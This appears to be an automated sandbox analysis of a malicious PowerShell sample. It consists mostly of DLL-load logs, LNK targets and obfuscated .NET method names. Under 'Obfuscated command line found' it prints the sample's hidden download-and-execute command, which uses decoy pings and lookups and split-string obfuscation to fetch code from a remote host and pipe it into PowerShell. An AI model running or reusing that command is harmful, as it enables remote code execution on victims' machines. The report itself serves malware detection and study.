Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: websocket.dll	Jump to behavior

Source: jKSjtQ8W7O.lnk	LNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Google Drive.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\System.pdb( source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: klib.pdbx source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Adobe.pdb source: powershell.exe, 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb,4@v source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ,.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb4 source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	.Net Code: Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777274)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777255)),Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777311))})
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	.Net Code: Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777274)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777255)),Type.GetTypeFromHandle(o46K2WTSAHbI7r65MkF.VGrK7e8qZB(16777311))})

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell

Suspicious powershell command line found

Source: unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4ADD5AEF push FFFFFFE8h; retf	0_2_00007FFB4ADD5AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4ADD7967 push ebx; retf	0_2_00007FFB4ADD796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4ADD00BD pushad ; iretd	0_2_00007FFB4ADD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADE0C2D push esp; retf	10_2_00007FFB4ADE0C2E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADD00BD pushad ; iretd	10_2_00007FFB4ADD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADD09AD push ss; iretd	10_2_00007FFB4ADD09C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADD776A pushad ; iretd	10_2_00007FFB4ADD785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADD785E push eax; iretd	10_2_00007FFB4ADD786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4B213D20 pushfd ; ret	10_2_00007FFB4B213D23
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4B21096D push 8B48FFC1h; iretd	10_2_00007FFB4B210972

Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, YqMKhJt51X4Ky0NobLY.cs	High entropy of concatenated method names: 's7qtRaBg4y', 'aPy54iFhWjAJZ1xOGtP', 'c5sK6nFeujjYGYRNToT', 'nEpU6DFODodHnrYlcku', 'vs3FExF8BSNtyV1JgjU', 'eYmZjfFLfCIdD8CQRLm'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, uiew8mTUhcOb3RQF7Wa.cs	High entropy of concatenated method names: 'rnFTZh7weN', 'stCTzmCKqu', 'IQQuvFar7r', 'VwYut3TNVX', 'zI9uiSVgB4', 'J3buMSt0qH', 'yFCu3N1GN4', 'P0luTGOEYw', 'I6KuunLJuT', 'HSPuwa7hFM'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, HYyMoMtWkqmWOB5JMqe.cs	High entropy of concatenated method names: 'qKkbxgBEoHEQlOmBmgI', 'cVhXFeBBWR2EpvFoeic', 'ub31o2BXx14TVhc8CgB', 'dtBMk1BFgCsUd1PqDQb', 'YoYnQpB1D3mCm7qtfxb', 'Wfl4QcBD5OePPT2MLVO', 'C6FtC2GOQa', 'sTttQrjDRY', 'tIDtVdHo13', 'QJutYPCqVB'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, C1NXrkc3UvioZEYQrK.cs	High entropy of concatenated method names: 'QcHKi73qq', 'jrvSaoyUB', 'Q4VH3X6FU', 'ANs5qVYlT', 'B9qI3WEKh', 'IFnh6nfr3hOoQh27fCq', 'dLqVe1fjM7JqQbO4xBu', 'g2sQDefaNdZpqyHy5fH', 'GSyKFdff9dmyv06xfcC', 'TrlGSvfq0QawsGjVjQk'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, WsClient.cs	High entropy of concatenated method names: 'P891b0WnD', 'XuiwRQaAryJ62Yhm1EX', 'Thq7OvaxRLPUm9fL0N2', 'SGQ0x7a44Y0YuQQZcF0', 'SBPWMTayihLdcVGG6mE', 'yVie07abhXtMfYhIDGf', 'IjrsBwacdVrRuwjrbAL', 'MoveNext', 'MoveNext', 'SetStateMachine'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, Sign.cs	High entropy of concatenated method names: 'KhHATYqnE', 'xMLxm5f87EAgcxrrRn9', 'Rg94ecfLJ7dEM5a56bc', 'tjr52ffhYi1qomX3JuR', 'DIvCImfe2sOk0gqeXfU', 'nT8GcwMXo', 'tcJPO2WnJ', 'r168cmfE2hG6htQDyn1', 'vNwCBgfFIDdKrk4NUUN', 'tiu0pUfBDUDPgIVAQGn'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, ftlHK9iNVHsUovuLfTN.cs	High entropy of concatenated method names: 'YNDiSKZNK5', 'CjSg4p19snO2yoJaRhU', 'Xkblvk1gtGYoB5pPvIn', 'A5jBE91oy7COmSAgWru', 'jqvmbi10SxbMyxpTdJp', 'RMwIGo1JFXEWlJJD6t3'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, fO2tNXn9jw3QJbOlhx.cs	High entropy of concatenated method names: 'spWZ4g2DZ', 'O5czEikd4', 'La5tvksoI0', 'lEfttEg0S2', 'e9WtiBGNiV', 'KU2JC9lqW3t62myoZtI', 'vQyx3jleObE0F1LeGqT', 'dU95balOesG7a604COG', 'cGD524l2kPHw5fGMbdd', 'UEVq22lrMcLmpeXWidf'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	High entropy of concatenated method names: 'W3TTnrdHYQAU0gCbLOv', 'LPI9xTd5L7heHm3qxXh', 'TTuT2DZnCl', 'RPSJ1Ed6fahDA5qnaSR', 'QdgRNOdGGLKlRSbu3ra', 'XoE78OdPjrctZT1Qmnf', 'AMSk2Ud0KIx05jVaKB9', 'NCUaXbdJSIL38FYfoMw', 'm8uCGCd9IXH8I9sTXyq', 'X7ERAYdgylU7CTAoiBa'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, muKlemtUJb9FDY9MpyK.cs	High entropy of concatenated method names: 'lbXtGHdsP8', 'RELuWwFjFAUW44IVKPc', 'fIc2WkFaPR7imTP8JmC', 'EYKNLdFfBX4c5SoU1iG', 'OH5spZF23SSXjspaeyr', 'qIh2nMFrn1GsscK1oic'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, oy9Q57ixYXL6eDBsPUs.cs	High entropy of concatenated method names: 'Aq6icvUVg0', 'dM5hXN1UDubTghNyY5A', 'iuuHGH163oWQpyvjCwy', 'ECOrgU1GYiB8BtUE5f2', 'si7r121I4QAAkfZJHcZ', 'zlPg4K1RHLa7yCUNaUJ'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, wAsBrhumJTLpHXMnaSZ.cs	High entropy of concatenated method names: 'ajWQf8Vyhf', 'W1XQlDmTnA', 'x7LQBturIK', 'eUHQXbHGjC', 'SYvQE7seDc', 'WnvQFVOasF', 'cTlQ1WZJix', 'AGJusBkkSj', 'Tr2QDbehep', 'KaBQd33BGk'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, ucPbfPJwI9dD5uyIC9.cs	High entropy of concatenated method names: 'EQLg8sV2b', 'jEQvCKfo9WVKkh0eJDZ', 'dqSTL3fkwGwhtI4K76s', 'eqA6yefnQqqSpxrr6kg', 'vLsXXaf7oORFvJbPtdT', 'eOM5PRf9eUgjUHAR5Vk', 'PEoPv6fgUt9uhLhvpKm'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, YqMKhJt51X4Ky0NobLY.cs	High entropy of concatenated method names: 's7qtRaBg4y', 'aPy54iFhWjAJZ1xOGtP', 'c5sK6nFeujjYGYRNToT', 'nEpU6DFODodHnrYlcku', 'vs3FExF8BSNtyV1JgjU', 'eYmZjfFLfCIdD8CQRLm'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, uiew8mTUhcOb3RQF7Wa.cs	High entropy of concatenated method names: 'rnFTZh7weN', 'stCTzmCKqu', 'IQQuvFar7r', 'VwYut3TNVX', 'zI9uiSVgB4', 'J3buMSt0qH', 'yFCu3N1GN4', 'P0luTGOEYw', 'I6KuunLJuT', 'HSPuwa7hFM'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, HYyMoMtWkqmWOB5JMqe.cs	High entropy of concatenated method names: 'qKkbxgBEoHEQlOmBmgI', 'cVhXFeBBWR2EpvFoeic', 'ub31o2BXx14TVhc8CgB', 'dtBMk1BFgCsUd1PqDQb', 'YoYnQpB1D3mCm7qtfxb', 'Wfl4QcBD5OePPT2MLVO', 'C6FtC2GOQa', 'sTttQrjDRY', 'tIDtVdHo13', 'QJutYPCqVB'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, C1NXrkc3UvioZEYQrK.cs	High entropy of concatenated method names: 'QcHKi73qq', 'jrvSaoyUB', 'Q4VH3X6FU', 'ANs5qVYlT', 'B9qI3WEKh', 'IFnh6nfr3hOoQh27fCq', 'dLqVe1fjM7JqQbO4xBu', 'g2sQDefaNdZpqyHy5fH', 'GSyKFdff9dmyv06xfcC', 'TrlGSvfq0QawsGjVjQk'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, WsClient.cs	High entropy of concatenated method names: 'P891b0WnD', 'XuiwRQaAryJ62Yhm1EX', 'Thq7OvaxRLPUm9fL0N2', 'SGQ0x7a44Y0YuQQZcF0', 'SBPWMTayihLdcVGG6mE', 'yVie07abhXtMfYhIDGf', 'IjrsBwacdVrRuwjrbAL', 'MoveNext', 'MoveNext', 'SetStateMachine'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, Sign.cs	High entropy of concatenated method names: 'KhHATYqnE', 'xMLxm5f87EAgcxrrRn9', 'Rg94ecfLJ7dEM5a56bc', 'tjr52ffhYi1qomX3JuR', 'DIvCImfe2sOk0gqeXfU', 'nT8GcwMXo', 'tcJPO2WnJ', 'r168cmfE2hG6htQDyn1', 'vNwCBgfFIDdKrk4NUUN', 'tiu0pUfBDUDPgIVAQGn'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, ftlHK9iNVHsUovuLfTN.cs	High entropy of concatenated method names: 'YNDiSKZNK5', 'CjSg4p19snO2yoJaRhU', 'Xkblvk1gtGYoB5pPvIn', 'A5jBE91oy7COmSAgWru', 'jqvmbi10SxbMyxpTdJp', 'RMwIGo1JFXEWlJJD6t3'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, fO2tNXn9jw3QJbOlhx.cs	High entropy of concatenated method names: 'spWZ4g2DZ', 'O5czEikd4', 'La5tvksoI0', 'lEfttEg0S2', 'e9WtiBGNiV', 'KU2JC9lqW3t62myoZtI', 'vQyx3jleObE0F1LeGqT', 'dU95balOesG7a604COG', 'cGD524l2kPHw5fGMbdd', 'UEVq22lrMcLmpeXWidf'
